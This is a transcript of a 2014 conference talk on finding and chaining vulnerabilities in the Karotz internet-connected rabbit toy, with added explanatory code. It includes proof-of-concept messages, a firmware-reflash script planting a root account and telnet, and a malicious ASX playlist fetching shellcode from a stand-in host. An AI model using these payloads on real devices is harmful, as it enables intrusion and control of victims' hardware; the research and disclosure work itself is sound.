
Hacking an Internet Enabled Lagomorph

ajxchapman
September 12, 2014


Presented at 44CON 2014



Transcript

1. Who am I?
▪ Alex Chapman (noxrnet)
▪ Vulnerability Researcher at Context Information Security
  – Specialise in Reverse Engineering, Vulnerability Discovery and Exploitation
  – New found interest in embedded (IoT) devices
    • Hacked your light bulbs
10/09/2014 @noxrnet
2. I feel I have to explain
▪ We set up an evening at work to hack the Internet of all the Things
  – IP Cameras
  – Light bulbs
  – Office peripherals
  – Toys
▪ The stage was set
  – Beer
  – Pizza
  – Old school hacker tunes
3. This talk
▪ I hope a number of you will understand my situation here
  – How could I, in any good faith, let a 9.6-inch rabbity thing survive unscathed???
▪ This talk will outline my descent into madness, and more precisely how that process led to identifying and exploiting 4+ (the exact number escapes me at the moment) vulnerabilities in the Karotz Interactive Smart Rabbit (and associated libraries)
  – This is not a piece of ground-breaking research, more a chronicle of one man's mission to nail that f’ing rabbit once and for all
4. Introducing Karotz
▪ Karotz the “Smart Companion” is a “stylish and communicative rabbit, connected to internet”
  – … really!
▪ More importantly, Karotz is
  – An ARM based embedded device
    • Samsung S3C2440 ARM9 processor
    • 2GB Hynix Flash
    • 512MB Hynix SDRAM
    • WiFi enabled
  – Linux based
5. Prior Art
▪ I’m not the first to attempt to compromise this particular lagomorph… bizarrely
▪ Daniel Crowley of Trustwave SpiderLabs
  – CVE-2013-4867 – Python Module Hijacking
    • DLL Hijacking for Python
    • Locally exploitable requiring physical access to the rabbit
  – CVE-2013-4868 – Cleartext Communications
    • No SSL between the rabbit and the server
    • Useful for intercepting comms
▪ https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-021.txt
6. Starting at the Start – Getting the Firmware
▪ Firmware updates downloaded from Karotz website
  – Update image provided to device via USB
    • With signed / encrypted blobs
  – Some binaries and libraries available from unencrypted yaffs file system images
  – Root file system GPG encrypted
    • However, can be downloaded unencrypted from the Karotz website
7. On / Off Target Debugging
▪ On target debugging allows you to find and ultimately debug vulnerabilities on the target device
  – Requires a method of code execution on the device before you can start
▪ Off target debugging allows you to find and debug vulnerabilities in an emulated environment
  – Can start to identify vulnerabilities without a pre-existing method of code execution
  – May not be representative of the actual device
    • Memory layout
    • Exploit protection mechanisms
    • Etc.
8. Raspberry Pi for Rabbity Emulation
▪ ARM11 based processor
  – Binary compatibility with Karotz ARM9 compiled binaries
▪ Extract interesting binaries and libraries from the Karotz firmware image and run them on the Raspberry Pi
  – Chrooted execution
▪ Great way to start looking for vulnerabilities where interactive access to the target device is not available
9. Vuln No. 1 – libmms Heap Overflow
▪ CVE-2014-2892
▪ Identified by simple fuzzing and instrumentation against Music Player Daemon (MPD) 0.15.0 on the Raspberry Pi
▪ Allows full corruption of process heap
10. libmms/src/mmsh.c

```c
static int get_answer (mms_io_t *io, mmsh_t *this) {

  int done, len, linenum;
  char *features;

  done = 0; len = 0; linenum = 0;
  this->stream_type = MMSH_UNKNOWN;

  while (!done) {

    /* one byte at a time into the fixed-size this->buf; len is never
       checked against the size of that buffer, so an overlong line from
       the server writes past the end of the heap-allocated mmsh_t */
    if (io_read(io, this->s, &(this->buf[len]), 1) != 1) {
      lprintf("end of stream\n");
      return 0;
    }

    if (this->buf[len] == '\012') {
      /* ... handling of a complete line, elided on the slide ... */
    } else {
      len ++;
    }
  }
```
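The slide says the bug was found by simple fuzzing of MPD on the Raspberry Pi. Below is an added example, not code from the talk, of the kind of throwaway harness that finds it: a local server that answers every connection with an HTTP-style reply whose first line has an attacker-chosen length. Since get_answer() copies the reply byte by byte into this->buf until it sees a newline, without checking len, any line longer than that buffer (its size is not stated on the slide) overruns the heap. The line lengths, the request the stand-in client sends and the reply headers are constructed here and are assumptions; the real client under test is the player pointed at the harness's port while running under gdb or strace.

```python
# Added example (not from the talk): a "malicious MMSH server" harness for fuzzing the
# client side of libmms. Everything below is constructed for illustration.
import socket
import threading


def build_reply(line_len: int, filler: bytes = b"A") -> bytes:
    """HTTP-style reply whose status line is exactly line_len bytes before the CRLF.

    The overlong first line is what get_answer() copies into this->buf one byte at
    a time, so sweeping line_len is the whole fuzzer.
    """
    status = b"HTTP/1.0 200 OK"
    if line_len < len(status):
        raise ValueError("line_len must be at least the length of the status prefix")
    line = status + filler * (line_len - len(status))
    return line + b"\r\n" + b"Content-Type: application/octet-stream\r\n\r\n"


class ReplyServer(threading.Thread):
    """Serve one fixed reply to every client on 127.0.0.1 and log what each sent."""

    def __init__(self, payload: bytes, port: int = 0):
        super().__init__(daemon=True)
        self.payload = payload
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(("127.0.0.1", port))     # port 0: let the OS pick one
        self.sock.listen(5)
        self.sock.settimeout(0.2)               # lets run() notice stop()
        self.port = self.sock.getsockname()[1]
        self.requests = []                      # raw requests, for the log
        self.running = True

    def run(self):
        while self.running:
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with conn:
                conn.settimeout(2.0)
                try:
                    self.requests.append(conn.recv(4096))   # the client's GET
                    conn.sendall(self.payload)              # then the long line
                except OSError:
                    pass

    def stop(self):
        self.running = False
        self.join()
        self.sock.close()


def fetch(port: int, timeout: float = 2.0) -> bytes:
    """Stand-in client: send a minimal request and read the reply to EOF."""
    with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n")
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # Sweep a few lengths; point the real client at mmsh://127.0.0.1:<port>/ for each.
    for n in (64, 4096, 200_000):
        srv = ReplyServer(build_reply(n))
        srv.start()
        print(f"serving a {n}-byte first line on port {srv.port}")
        srv.stop()
```

Run it with a length well above the buffer size and attach gdb to the player before it connects; the crash lands inside get_answer() with the filler byte in the corrupted heap data, which is the instrumentation signal the slide refers to.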
11. libmms Heap Overflow
▪ Heap memory corruption
  – Pure C application with little to no interesting data in the heap
    • No vtables, function pointers, object pointers
    • Very boring!
  – A little messy and would take time to craft a reliable exploit
▪ In the scenario of limited exploitability
12. Limitations to Off Target Debugging
▪ Not viable where applications expect to interact with specific hardware
▪ Karotz Controller application
  – Responsible for processing connections from port 9123/tcp
  – Interacts with hardware before entering the running loop
    • Exits on hardware interaction error!
  – Difficult to emulate in an off target environment
13. On Target Debugging
▪ Update the device firmware to allow us remote root access
  – Unfortunately firmware updates are signed!
▪ Usual update process decrypts local firmware, or downloads unencrypted firmware from the website, and flashes it to the device
  – Uses on device binaries flash_eraseall and nandwrite to do this
▪ Can we manually perform this process to allow the running of modified firmware?
  – Use CVE-2013-4867 to modify the device firmware
14. Python Module Hijacking
▪ Create a new rootfs.img.gz firmware image with the following modifications
  – /karotz/etc/passwd
    • ctx:$1$1b7zwtVU$SsmyTuLTqYkYEKX5GdyFh/:0:0:ctx:/usr/karotz:/bin/bash
  – /karotz/etc/inetd.conf
    • telnet stream tcp nowait root /sbin/telnetd telnetd

```python
# Hijacked Python module (CVE-2013-4867): runs as the update process, from the USB key
import os
# Play an MP3 with madplay as an audible cue that the module has been loaded
os.system("LD_LIBRARY_PATH=/tmp /tmp/madplay /tmp/16.mp3")
# Leave a marker file on the USB key
os.system("echo 1 > /mnt/usbkey/ctx.run")
# Erase the flash partition and write the modified root file system image to it
os.system("/sbin/flash_eraseall /dev/mtd2")
os.system("/sbin/nandwrite -pm /dev/mtd2 /mnt/usbkey/ctx/rootfs.img.gz")
# Audible cue that flashing has finished
os.system("LD_LIBRARY_PATH=/tmp /tmp/madplay /tmp/16.mp3")
```
15. Cross Compiling Tool Chains???
▪ Unfortunately Karotz does not ship with debugging tools ☹
▪ We need to cross compile any tool we may need for ARM9
  – gdb / gdbserver
  – strace
  – Etc.
▪ Buildroot to the rescue
  – http://buildroot.uclibc.org/
  – Set of make files used to build embedded system images
  – Creates a tool chain which can be used to cross compile individual applications
16. My Very First Google Protocol Buffers
▪ “Protocol buffers are Google's language-neutral, platform-neutral, extensible mechanism for serializing structured data”
  – https://developers.google.com/protocol-buffers/
▪ Karotz communicates with the backend servers using protocol buffers
  – Without encryption of any kind!
  – Thank you Dan Crowley for pointing that one out
▪ Can we MitM the traffic to replace the need for the backend Karotz server?
17. Protocol Buffers
▪ Simple tag-length based protocol
▪ Discrete messages sent and received
▪ Messages defined using C-like structures

Definition:
```proto
message Person {
  required string name = 1;
  required int32 age = 2;
  optional string email = 3;
}
```

Populated message:
```
message Person {
  name = "Karotz";
  age = 7;
  email = "[email protected]";
}
```

Fields on the wire, as (wire type, field number, length, value):
```
(2, 1, 6, "Karotz")
(0, 2, 7)
(2, 3, 17, "[email protected]")
```

Encoded bytes:
```
'\x0a\x06Karotz\x10\x07\x1a\x11[email protected]'
```
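To make the slide's tuples and byte string concrete, here is an added example (not code from the talk, and not the Karotz client's own serialiser) of a minimal protobuf wire encoder and decoder covering the two wire types the slide uses: 0 (varint, for int32) and 2 (length-delimited, for string). It reproduces the Person message, shows why the ttl: -2 in the later HeapCrashPOC costs ten bytes on the wire, and shows what an empty interactiveId looks like. The e-mail address is constructed here because the slide's value is redacted; field numbers are the slide's.

```python
# Added example (not from the talk): hand-rolled protobuf wire format, wire types 0 and 2.
from typing import List, Tuple, Union

VARINT, LENGTH_DELIMITED = 0, 2


def encode_varint(value: int) -> bytes:
    """Base-128 varint. Negative int32 values are sign-extended to 64 bits by the
    protobuf spec, which is why an int32 of -2 takes ten bytes."""
    if value < 0:
        value &= (1 << 64) - 1
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)       # continuation bit set
        else:
            out.append(byte)
            return bytes(out)


def decode_varint(data: bytes, pos: int) -> Tuple[int, int]:
    """Return (value, new_pos); rejects truncated or over-long (>10 byte) varints."""
    result, shift = 0, 0
    while True:
        if pos >= len(data):
            raise ValueError("truncated varint")
        byte = data[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return result, pos
        if shift > 63:
            raise ValueError("varint longer than 10 bytes")


def encode_field(field_number: int, value: Union[int, str, bytes]) -> bytes:
    """One field: tag = (field_number << 3) | wire_type, then the payload."""
    if isinstance(value, int):
        return encode_varint((field_number << 3) | VARINT) + encode_varint(value)
    payload = value.encode() if isinstance(value, str) else value
    return (encode_varint((field_number << 3) | LENGTH_DELIMITED)
            + encode_varint(len(payload)) + payload)


def encode_message(fields: List[Tuple[int, Union[int, str, bytes]]]) -> bytes:
    return b"".join(encode_field(n, v) for n, v in fields)


def decode_message(data: bytes) -> List[Tuple[int, int, Union[int, bytes]]]:
    """Decode to (wire type, field number, value) tuples. Varints come back unsigned;
    apply to_int32() to fields the .proto declares as int32."""
    pos, fields = 0, []
    while pos < len(data):
        tag, pos = decode_varint(data, pos)
        wire_type, field_number = tag & 0x7, tag >> 3
        if wire_type == VARINT:
            value, pos = decode_varint(data, pos)
        elif wire_type == LENGTH_DELIMITED:
            length, pos = decode_varint(data, pos)
            if pos + length > len(data):
                raise ValueError("length-delimited field runs past end of message")
            value, pos = data[pos:pos + length], pos + length
        else:
            raise ValueError(f"wire type {wire_type} not handled in this example")
        fields.append((wire_type, field_number, value))
    return fields


def to_int32(raw: int) -> int:
    """Reinterpret a decoded varint as a signed 32-bit value."""
    raw &= 0xFFFFFFFF
    return raw - (1 << 32) if raw & 0x80000000 else raw


# The slide's Person message: name = 1, age = 2, email = 3 (e-mail constructed).
PERSON = [(1, "Karotz"), (2, 7), (3, "karotz@example.org")]
PERSON_WIRE = encode_message(PERSON)

if __name__ == "__main__":
    print(PERSON_WIRE)                      # b'\n\x06Karotz\x10\x07\x1a\x12karotz@example.org'
    print(decode_message(PERSON_WIRE))
    print(encode_varint(-2).hex())          # ttl: -2 as an int32: ten bytes
    print(encode_field(3, "").hex())        # an empty string field: tag, then length 0
```

Note the two facts a PoC author cares about: a length-delimited field is only as long as its length byte says, so the decoder's bounds check is what a vulnerable parser lacks; and an empty string is still a legal field (tag plus zero length), which matters for the authentication bypass later in the talk.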
18. Replacing the Pesky Karotz Server
▪ Each boot Karotz registers with the backend server
  – Messages
    • HELO
    • Application registration
    • Timezone configuration
    • Ping / Pong
▪ Simple protocol buffers messages which can be easily emulated
  – Karotz seems to ignore most of the returned values anyway!
▪ Now we can work offline, even when the Karotz servers go down
  – Which seems to happen a fair bit!
19. Vuln No. 2 – Controller Heap Overflow
▪ Identified via manual authentication attempts
▪ Allows full corruption of process heap
20. Controller Heap Overflow
▪ Heap memory corruption good
  – A little messy and would take time to craft a reliable exploit
▪ Let’s keep looking

```
id: "HeapCrashPOC"
interactiveMode {
  action: START
  interactiveId: "AAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  ttl: -2
  access: "5"
}
```
21. Vuln No. 3 – Authentication Bypass
▪ Identified via binary reverse engineering
  – (Probably observed earlier, but unaware of the consequence)
▪ Allows access to all Karotz features unauthenticated from the local network!
22. Authentication Bypass
▪ During normal authentication the client application authenticates to the Karotz server
  – The Karotz server in turn pushes an interactiveId to both the rabbit controller service and the client, which is then used as a shared secret
▪ The authentication function checks the provided interactiveId against the stored interactiveId to determine if the client is authorised
23. Authentication Bypass
▪ However, upon startup the controller service initialises the interactiveId variable to an empty string
▪ The authentication function checks the provided interactiveId against the stored interactiveId to determine if the client is authorised

```
id: "AuthBypassPOC"
interactiveId: ""
```

"" == ""
24. Authentication Bypass
▪ Authentication bypass good
  – But does not directly lead to code execution
▪ Getting closer, but more work required
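The bypass on slides 22 and 23 comes down to a shared secret whose initial value is the empty string, compared with plain equality. The following is an added example, not code from the talk or from the Karotz controller binary: a model of that check as the slides describe it, next to a hardened version, with the restart step from slide 33 included so the before/after state is visible. Class and function names, the message shape and the length policy are assumptions made for illustration.

```python
# Added example (not from the talk): the controller's interactiveId check as described
# on the slides, beside a hardened version. Names and message shape are assumptions.
import hmac
import secrets
from typing import Dict, Optional


class VulnerableController:
    """interactiveId starts as "" on startup and is only replaced when the backend
    pushes one; authorisation is plain string equality (slide 23)."""

    def __init__(self):
        self.interactive_id = ""

    def push_interactive_id(self, value: str):      # backend -> controller
        self.interactive_id = value

    def authenticate(self, message: Dict[str, str]) -> bool:
        # A missing proto2 string field reads back as "", so omitting it works too.
        provided = message.get("interactiveId", "")
        return provided == self.interactive_id


class HardenedController:
    """Same flow, but: no pushed secret means no access, an empty or short secret
    is refused at push time, and the comparison is constant-time."""

    def __init__(self):
        self.interactive_id: Optional[str] = None

    def push_interactive_id(self, value: str):
        if not value or len(value) < 16:             # policy chosen for this example
            raise ValueError("refusing an empty or short interactiveId")
        self.interactive_id = value

    def authenticate(self, message: Dict[str, str]) -> bool:
        provided = message.get("interactiveId")
        if self.interactive_id is None or not provided:
            return False
        return hmac.compare_digest(provided.encode(), self.interactive_id.encode())


def attack_after_restart(controller_cls) -> bool:
    """Slide 33, step 1: a crash/restart puts the stored secret back to its initial
    state; step 2: send the AuthBypassPOC message with interactiveId ""."""
    ctl = controller_cls()                           # fresh process, nothing pushed
    return ctl.authenticate({"id": "AuthBypassPOC", "interactiveId": ""})


def attack_with_secret_set(controller_cls) -> bool:
    """Once the backend has pushed a real interactiveId, "" no longer matches."""
    ctl = controller_cls()
    ctl.push_interactive_id(secrets.token_hex(16))
    return ctl.authenticate({"id": "AuthBypassPOC", "interactiveId": ""})


if __name__ == "__main__":
    print("vulnerable, fresh start:", attack_after_restart(VulnerableController))    # True
    print("vulnerable, secret set :", attack_with_secret_set(VulnerableController))  # False
    print("hardened, fresh start  :", attack_after_restart(HardenedController))      # False
```

The model also shows why crashing the controller is step 1 and step 4 of the chain on slide 33: the secret lives only in process memory, so every restart reopens the window until the backend pushes a new interactiveId.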
25. Increasing the Attack Surface
▪ The authentication bypass vulnerability opens up the attack surface
▪ We now have access to
  – Audio
  – Microphone
  – Video Camera
  – Ears(!)
▪ Can we identify further vulnerabilities in these services?
26. Exploiting Packaged Applications
▪ Extended functionality (music, video, ears) implemented via shared libraries and packaged applications
▪ Music playing functionality handed off to MPlayer via a call to system()
  – Initial hope for command injection, however it was not vulnerable
    • More by accident than design I believe
  – However, the version of MPlayer packaged is version 1.1
    • Known vulnerabilities!
27. Vuln No. 4 – MPlayer Remote File Overwrite
▪ OSVDB 97351
▪ Advisory released September 2013
▪ No public exploit available
  – Vulnerability advisories sparse
    • “MPlayer contains a flaw that may allow a malicious remote server to overwrite a file on the victim's system”
    • “A vulnerability has been reported in MPlayer, which can be exploited by malicious people to manipulate certain data.”
28. Use the Source
▪ Vulnerabilities fixed in version 1.1.1
▪ Diffing with the vulnerable 1.1 version shows very few changes
  – Majority of changes focus on asx playlist processing
29. ASX Parser

MPlayer-1.1/asxparser.c (vulnerable: a <param> naming any known option is applied to the play tree):
```c
static void
asx_parse_param(ASX_Parser_t* parser, char** attribs, play_tree_t* pt) {
  char *name,*val;

  name = asx_get_attrib("NAME",attribs);
  if(!name) {
    asx_warning_attrib_required(parser,"PARAM" ,"NAME" );
    return;
  }
  val = asx_get_attrib("VALUE",attribs);
  if(m_config_get_option(mconfig,name) == NULL) {
    mp_msg(MSGT_PLAYTREE,MSGL_WARN,"Found unknown param in asx: %s",name);
    if(val)
      mp_msg(MSGT_PLAYTREE,MSGL_WARN,"=%s\n",val);
    else
      mp_msg(MSGT_PLAYTREE,MSGL_WARN,"\n");
    return;
  }
  play_tree_set_param(pt,name,val);
  free(name);
  free(val);
}
```

MPlayer-1.1.1/asxparser.c (fixed: playlist parameters are no longer honoured):
```c
static void
asx_parse_param(ASX_Parser_t* parser, char** attribs, play_tree_t* pt) {
  char *name = NULL,*val = NULL;

  name = asx_get_attrib("NAME",attribs);
  if(!name) {
    asx_warning_attrib_required(parser,"PARAM" ,"NAME" );
    return;
  }
  val = asx_get_attrib("VALUE",attribs);
  if(m_config_get_option(mconfig,name) == NULL) {
    mp_msg(MSGT_PLAYTREE,MSGL_WARN,"Found unknown param in asx: %s",name);
    if(val)
      mp_msg(MSGT_PLAYTREE,MSGL_WARN,"=%s\n",val);
    else
      mp_msg(MSGT_PLAYTREE,MSGL_WARN,"\n");
    goto err_out;
  }
  mp_msg(MSGT_PLAYTREE, MSGL_ERR, "Support for specifying parameters in playlists has been disabled.\n");
  // play_tree_set_param(pt,name,val);
err_out:
  free(name);
  free(val);
}
```
30. Malicious ASX
▪ ASX is a Microsoft specification, but it doesn’t include these elements!
  – Dumpstream – Enable dumping of the currently playing stream
  – Dumpfile – Specify where to dump the stream to

```xml
<asx version="3.0">
  <repeat count="2">
    <title>Exploit</title>
    <param name="dumpstream" value="true" />
    <param name="dumpfile" value="/usr/karotz/file_to_overwrite" />
    <entry>
      <title>ShellCode</title>
      <ref href="http://maliciouserver/shell" />
    </entry>
  </repeat>
</asx>
```
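Where a device has to keep running an MPlayer 1.1 build, the practical defence is to refuse playlists that carry <param> elements before they reach the player, which is the same stance MPlayer 1.1.1 took in code. The following is an added example, not part of the talk and not MPlayer code: a small ASX pre-filter that walks the whole playlist (including <repeat> and <entry> nesting), reports any <param> pairs and flags the ones that would make MPlayer 1.1 write attacker-named files. The sample playlist is the slide's; the option list and the case-insensitive matching (MPlayer's ASX parser is assumed here to match element and attribute names without regard to case) are assumptions.

```python
# Added example (not from the talk): ASX pre-filter for players built on MPlayer 1.1.
import xml.etree.ElementTree as ET
from typing import List, Tuple

# MPlayer options a playlist has no business setting (assumed list; extend as needed).
DANGEROUS_PARAMS = {"dumpstream", "dumpfile", "dumpaudio", "dumpvideo"}

# The playlist from the slide, embedded as sample input.
MALICIOUS_ASX = """<asx version="3.0">
<repeat count="2">
<title>Exploit</title>
<param name="dumpstream" value="true" />
<param name="dumpfile" value="/usr/karotz/file_to_overwrite" />
<entry>
<title>ShellCode</title>
<ref href="http://maliciouserver/shell" />
</entry>
</repeat>
</asx>"""

# A constructed benign playlist for comparison.
BENIGN_ASX = """<asx version="3.0">
<entry><title>Radio</title><ref href="http://radio.example.org/stream.mp3" /></entry>
</asx>"""


def _attr(elem: ET.Element, name: str) -> str:
    """Case-insensitive attribute lookup (NAME/name, VALUE/value)."""
    for key, value in elem.attrib.items():
        if key.lower() == name:
            return value
    return ""


def find_params(asx_text: str) -> List[Tuple[str, str]]:
    """Every (name, value) <param> pair anywhere in the playlist, names lower-cased."""
    root = ET.fromstring(asx_text)
    found = []
    for elem in root.iter():                     # walks repeat/entry nesting too
        if elem.tag.lower() == "param":
            found.append((_attr(elem, "name").lower(), _attr(elem, "value")))
    return found


def dangerous_params(asx_text: str) -> List[Tuple[str, str]]:
    """The subset of params that would turn MPlayer 1.1 into a remote file writer."""
    return [(n, v) for n, v in find_params(asx_text) if n in DANGEROUS_PARAMS]


def is_safe_playlist(asx_text: str) -> bool:
    """Filter policy: reject any playlist carrying a <param> at all, rather than
    trying to enumerate every bad option; unparseable input is rejected as well."""
    try:
        return not find_params(asx_text)
    except ET.ParseError:
        return False


if __name__ == "__main__":
    print(dangerous_params(MALICIOUS_ASX))
    print(is_safe_playlist(MALICIOUS_ASX), is_safe_playlist(BENIGN_ASX))
```

Rejecting all parameters rather than a denylist mirrors the upstream fix: the vulnerable code path applies any name that m_config_get_option() recognises, so a denylist has to track MPlayer's whole option table to be complete.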
31. File Overwrite to Code Execution
▪ Several limitations
  – Can’t overwrite a running process binary
  – / mounted read-only
    • /karotz – Read-write
    • /usr – Read-write
    • /var – Read-write
  – Need to be able to run the overwritten file for code execution
32. File Overwrite to Code Execution - Options
▪ Overwrite inetd.conf?
  – Requires a reboot
▪ Overwrite a library?
  – Could have unexpected consequences
▪ Overwrite a Karotz specific daemon?
  – Could break things
33. Putting it All Together
1. Crash the controller service to reset the interactiveId parameter
2. Use the authentication bypass vulnerability to get MPlayer to load a malicious asx playlist
3. Overwrite a module which is loaded by the controller service with our desired code
4. Crash the controller service again
5. Profit!
34. So what?
▪ Let’s be honest, this wasn’t really about the outcome
  – Even though I did find a few l33t 0dayz
▪ The journey was the point of the project
  – I encourage all of you out there, whether seasoned VR guys or hobbyists, to pick a project and run with it
35. Mitigating the Issues
▪ If you have a Karotz (I have several) you may be concerned about what I have presented here!
▪ All issues have been reported to the vendor… several times
  – 4 months have passed since the initial vulnerability report
  – The vendor has still not confirmed if any patches will be issued
    • The devices appear to no longer be sold
    • And the servers are offline quite often
    • Abandonware?
▪ In lieu of patches
  – Firewall your rabbit!
  – I also recommend implementing your own Karotz server
36. Lessons Learned
▪ Hacking toy devices can be fun!
  – Security is often an after-thought (if it is considered at all)
▪ Just because someone has already looked at a device doesn’t mean there isn’t more to find
  – Different focuses often lead to different results
▪ Still plenty of attack surface left which has not been assessed if anyone fancies picking up the baton?